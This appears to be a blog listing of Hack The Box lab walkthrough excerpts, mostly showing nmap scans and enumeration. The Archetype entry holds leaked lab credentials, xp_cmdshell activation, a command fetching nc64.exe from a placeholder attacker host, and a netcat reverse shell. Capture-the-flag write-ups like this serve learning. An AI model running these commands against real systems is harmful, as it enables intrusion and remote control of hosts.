Two Million Machine Walkthrough

1. Nmap scanning
    nmap 10.10.11.221 -sC -sV --open
Findings
Port 22 (SSH)
Port 80 (HTTP)
2. Enumeration
To access the website, we need to resolve the hostname to its IP in the /etc/hosts file:
    echo "10.10.11.221 2million.htb" | sudo tee -a /etc/hosts
Visit the /invite page and you can find the inviteapi.min.js file in devtools. Deobfuscate it at https://matthewfl.com/unPacker.html. We got: There is a makeInviteCode() function that sends an API POST request to /api/v1/how/to/generate. Use curl or Burp Suite Repeater to send requests. It’s important that you save the PHPSESSID cookie somewhere. ...

July 12, 2025

Cap Machine Walkthrough

1. Nmap scanning
    nmap 10.10.10.245 -sC -sV --open -oN scans/nmap_inital
Findings
Port 21 (FTP)
Port 22 (SSH)
Port 80 (Gunicorn HTTP server)
2. Enumeration
FTP
Let’s try to connect to the FTP service, maybe it’s misconfigured. Nah… it needs a user with a password.
HTTP
When visiting the website, we find ourselves in the security dashboard. In the burger menu there is a Security Snapshot page. When downloading the snapshot, we see an 8.pcap file that contains nothing useful for us. Let’s try to change the request to: ...

July 12, 2025

Unified Machine Notes

Start by scanning all the open ports on the host.
1. Nmap Scanning
    nmap 10.129.96.149 -sC -sV --open -oA scans/nmap_initial
Note: before adding -oA scans/your_nmap_scan, make sure you have a scans/ folder, otherwise nmap will give an error about a non-existing directory.
Findings
Port 22 (SSH)
Port 6789 (ibm-db2-admin?)
Port 8080 (Apache Tomcat HTTP server)
Port 8443 (Nagios NSCA)
2. Enumeration
There are a lot of ports available to us, but let’s visit the HTTP server first, it’s easy. Before that, start Burp Suite, maybe it’ll come in handy. I will use Chromium with a proxy + Burp Suite: ...

July 11, 2025

Vaccine Machine Notes

1. Nmap scanning
Just as always, let’s scan open ports using nmap:
    nmap 10.129.127.158 -sC -sV --open
Findings
Port 21 (FTP) is open, and the scan also shows a file named backup.zip on the server
Port 22 (SSH) is open
Port 80 (Apache HTTP server) - let’s access it on the web later
2. Enumeration
FTP Server
Let’s try to log in to the FTP service without a password, using the username anonymous. It will ask you for a password; you can just hit ENTER. ...

July 9, 2025

Oopsie Machine Walkthrough

Let’s start by scanning the services running on the host.
1. Nmap scanning
    nmap 10.129.5.130 -sC -sV --open
Findings:
Port 80 is open (Apache server), we can access it with a browser
Port 22 is open (SSH)
2. Web Enumeration
The website is probably about some vehicle services. Scrolling the page, we encounter an interesting section about an existing login page. We should find out more about that login form page, so we can use Burp Suite to retrieve all the data about the website. Start Burp Suite: ...

July 8, 2025

Archetype HTB Walkthrough

1. Initial Recon
Nmap Scan
    nmap -sCV -p- --open 10.129.95.187 -oN nmap_scan
Findings:
Port 445 (SMB) - Potential file shares
Port 1433 (MSSQL) - Microsoft SQL Server
2. SMB Enumeration
List Shares
    smbclient -N -L //10.129.95.187
Found share: backups
Access Share
    smbclient \\\\10.129.95.187\\backups -N
Downloaded prod.dtsConfig containing credentials:
User: ARCHETYPE\sql_svc
Password: M3g4c0rp123
3. MSSQL Exploitation
Setup Impacket
    python -m venv impacket_venv
    source impacket_venv/bin/activate
    pip install .
Connect to MSSQL
    python examples/mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.129.95.187 -windows-auth
Enable xp_cmdshell
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;
4. Reverse Shell
Setup Listener
    nc -lvnp 443
Transfer nc.exe
    xp_cmdshell "powershell -c wget http://YOUR_IP/nc64.exe -outfile C:\Users\sql_svc\Downloads\nc64.exe"
Execute Shell
    xp_cmdshell "C:\Users\sql_svc\Downloads\nc64.exe -e cmd.exe YOUR_IP 443"
5. Privilege Escalation
Found Credentials
    type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Found admin credentials: administrator:MEGACORP_4dm1n!!
...

July 6, 2025